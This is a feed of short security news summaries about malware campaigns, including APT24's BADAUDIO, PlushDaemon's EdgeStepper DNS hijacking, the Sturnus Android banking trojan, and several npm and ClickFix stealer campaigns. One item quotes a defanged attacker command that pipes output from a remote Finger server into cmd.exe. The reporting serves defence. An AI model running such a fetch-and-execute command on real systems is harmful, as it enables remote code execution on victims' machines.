All news with #malware tag

🔍 Google Threat Intelligence Group (GTIG) details a three-year espionage campaign by APT24 deploying the obfuscated BADAUDIO downloader to deliver AES-encrypted payloads, including Cobalt Strike beacons. The actor evolved from broad strategic web compromises to targeted supply-chain abuse of a Taiwanese digital marketing firm and spear-phishing lures. BADAUDIO uses DLL search order hijacking, control-flow flattening, and cookie-based beaconing to retrieve decrypted payloads in memory. GTIG added related domains and files to Safe Browsing, issued victim notifications, and published IOCs and YARA rules to support detection and mitigation.

🔒 PlushDaemon, a China-linked APT, has deployed a network implant called EdgeStepper to hijack DNS on compromised routers and redirect update traffic to attacker-controlled servers, according to ESET. The MIPS32 Go-built implant modifies iptables to forward UDP port 53 to a local proxy that substitutes legitimate update IPs with malicious ones. Using the hijacked channel, a downloader chain (LittleDaemon, DaemonicLogistics) delivers the espionage backdoor SlowStepper, enabling credential theft, document exfiltration and audio/video capture.

🛡️ ThreatFabric has detailed a new Android banking trojan named Sturnus that combines screen-capture, accessibility abuse, and overlays to steal credentials and enable full device takeover. The malware captures decrypted messages from WhatsApp, Telegram, and Signal by recording the device screen, serves region-specific fake banking login screens, and contacts operator servers via WebSocket/HTTP to receive encrypted payloads and enable remote VNC-style control. It resists cleanup by blocking uninstallation and leveraging administrator privileges.

🔒Sturnus is a new Android banking trojan discovered by ThreatFabric that can capture decrypted messages from end-to-end encrypted apps like Signal, WhatsApp, and Telegram. It abuses Accessibility services and on-screen capture to read message content and deploys HTML overlays to harvest banking credentials. The malware also supports real-time, AES-encrypted VNC remote control and obtains Android Device Administrator privileges to resist removal while targeting European financial customers with region-specific overlays.

📰 In episode 444 of the Smashing Security podcast Graham Cluley and guest Tricia Howard examine a refreshingly candid breach response where a company apologised and redirected a ransom payment to cybersecurity research, illustrating how legacy systems can still magnify risk. They unpack a sophisticated hotel-booking malware campaign that abuses trust in apps and CAPTCHAs to deliver PureRAT. The hosts also discuss the rise of autonomous pen testing, AI-turbocharged cybercrime, and practical questions CISOs should be asking on Monday morning, with a featured interview featuring Snehal Antani from Horizon3.ai.

⚠️ Acronis Threat Research Unit (TRU) reports an ongoing global malvertising campaign, dubbed TamperedChef, that employs counterfeit installers masquerading as popular utilities and product manuals to deploy an information-stealer and obfuscated JavaScript backdoors. Operators use SEO poisoning, malicious ads, and abused code-signing certificates from shell companies in the U.S., Panama, and Malaysia to increase trust and evade detection. Installers drop an XML file to create a scheduled task that launches the JavaScript backdoor, which exfiltrates encrypted, Base64-encoded JSON over HTTPS. Infections concentrate in the U.S. and have also been observed in Israel, Spain, Germany, India, and Ireland, with healthcare, construction, and manufacturing among the most affected sectors.

📲 Trustwave SpiderLabs describes a Python-based WhatsApp worm that propagates a Delphi credential stealer named Eternidade Stealer across Brazilian devices. The campaign begins with an obfuscated Visual Basic Script dropper that installs both a Python WPPConnect-based propagator and an MSI/AutoIt installer which injects the stealer into svchost.exe. Operators use IMAP to fetch dynamic C2 addresses and apply Brazilian Portuguese geofencing to limit infections to the target region.

🔒 Trustwave SpiderLabs has identified Eternidade Stealer, a multi-component banking Trojan that combines a Python-based WhatsApp-propagating worm, a Delphi stealer and an MSI dropper to harvest financial credentials and spread laterally. The campaign uses an obfuscated VBScript to deliver two payloads, dynamically retrieves command-and-control via IMAP and activates only on systems using Brazilian Portuguese. Defenders should watch for unexpected MSI or script executions, suspicious WhatsApp messages and indicators linked to the campaign.

🛡️ A China-aligned group known as PlushDaemon has been observed deploying a previously undocumented network implant, codenamed EdgeStepper, to perform adversary-in-the-middle DNS attacks. ESET researchers found an ELF sample (internally called dns_cheat_v2) that forwards DNS traffic to attacker-controlled nodes, enabling update hijacking. Operators then deploy downloaders LittleDaemon and DaemonLogistics to install espionage backdoors.

🔒 PlushDaemon operators are hijacking software-update traffic using a new network implant named EdgeStepper, ESET researchers report. Attackers compromise routers via known vulnerabilities or weak credentials, intercept DNS queries, and redirect update requests to malicious infrastructure. Trojanized updates deliver a DLL downloader (LittleDaemon), which stages DaemonicLogistics and ultimately loads the SlowStepper backdoor on Windows systems, targeting manufacturers, universities, and industrial sites across multiple countries.

🔒 This article by Stan Kaminsky reviews Athanasios Giatsos’ Security Analyst Summit 2025 talk and explains why malicious browser extensions are a major blind spot for organizations. It outlines how extensions can access cookies, local storage, proxy settings, clipboard and screen capture, enabling session and account theft, espionage, ad fraud and crypto theft, and why Manifest V3 reduces but does not eliminate risk. Practical controls described include formal extension policies and allowlists, disabling developer mode, version pinning and testing of updates, EDR and SIEM-based monitoring, and the use of specialized vetting tools for deeper analysis.

🛡️ Researchers from the Socket Threat Research Team uncovered a new npm malware campaign operated by threat actor dino_reborn, distributed across seven packages that executed immediately and fingerprinted visitors. The packages used Adspect proxying and cloaking to distinguish researchers from victims, delivering branded fake CAPTCHAs and dynamic redirects to malicious crypto sites. Anti-analysis measures disabled developer tools and user interactions to hinder inspection.

🛡️ AWS has updated the Transfer Family Terraform module to support automated malware scanning workflows for files transferred to S3. The module provisions GuardDuty S3 Protection–based scan pipelines, dynamic routing based on results, and threat notifications in a single deployment. It preserves folder structure, allows granular S3 prefix targeting, and helps ensure only verified clean files reach applications and data lakes.

🔍 Morphisec observed an AI-enhanced intrusion in October 2025 that targeted a major US real estate firm using the modular Tuoni C2 framework. The campaign began with a Microsoft Teams impersonation and a PowerShell one-liner that spawned a hidden process to retrieve a secondary script. That loader downloaded a BMP file and used least significant bit steganography to extract shellcode, executing it entirely in memory and reflectively loading TuoniAgent.dll. Researchers noted AI-generated code patterns and an encoded configuration pointing to two C2 servers; Morphisec's AMTD prevented execution.

⚠️Seven npm packages published under the developer name 'dino_reborn' were found leveraging the cloud-based Adspect service to distinguish researchers from potential victims and redirect targeted users to cryptocurrency scam pages. Socket's analysis shows six packages include a ~39 KB cloaking script that fingerprints visitors, employs anti-analysis controls, and forwards data to an actor-controlled proxy and the Adspect API. Targets are redirected to deceptive Ethereum and Solana-branded CAPTCHA pages, while likely researchers are shown a benign Offlido-style decoy.

🔒 Researchers identified a ClickFix-based EVALUSION campaign deploying Amatera Stealer and NetSupport RAT, observed in November 2025. The campaign abuses the Windows Run dialog and mshta.exe to launch a PowerShell script that downloads a .NET DLL hosted on MediaFire; the Amatera DLL, packed with PureCrypter, is injected into MSBuild.exe to exfiltrate data. eSentire highlights Amatera's WoW64 SysCalls evasion and conditional NetSupport deployment when domain membership or valuable files are detected.

🔎 The Contagious Interview campaign is delivering trojanized coding tests that fetch heavily obfuscated JavaScript from public JSON-storage services such as JSON Keeper, JSONSilo, and npoint.io. When executed in a Node.js test run the payloads decode and install the BeaverTail infostealer and then stage the InvisibleFerret RAT. NVISO Labs warns attackers are abusing developer trust and legitimate platforms and recommends sandboxing, auditing config files, and blocking suspicious outbound requests.

🔒 Elastic Security Labs and Unit 42 describe a China‑focused campaign in which the actor Dragon Breath uses a multi‑stage loader named RONINGLOADER to deliver a modified Gh0st RAT. The attack leverages trojanized NSIS installers that drop two embedded packages—one benign and one stealthy—to load a DLL and an encrypted tp.png file containing shellcode. The loader employs signed drivers, WDAC tampering, and Protected Process Light abuse to neutralise endpoint protections popular in the Chinese market before injecting a persistent high‑privilege backdoor.

🛡️ Researchers warn the decades-old Finger protocol is being repurposed in ClickFix-style campaigns to fetch remote commands and execute them on Windows systems. Attackers social-engineer victims into running batch commands such as finger root@finger.nateams[.]com | cmd, piping remote output directly into cmd.exe. Observed chains create randomly named folders, copy and rename curl.exe, download a ZIP disguised as a PDF, extract a Python malware package and launch it via pythonw.exe. Blocking outbound TCP port 79 is the primary mitigation to prevent systems from connecting to remote Finger daemons.

🔥 A coordinated worm is flooding the npm registry with packages designed to steal tokens from developers using the Tea Protocol, researchers say. Amazon and Sonatype report the campaign has expanded to roughly 153,000 packages, up from about 15,000 a year ago. While Tea tokens currently lack monetary value, experts warn threat actors could pivot to deliver malware or monetize rewards when Mainnet launches. Repositories and IT teams are urged to tighten access controls and deploy advanced detection.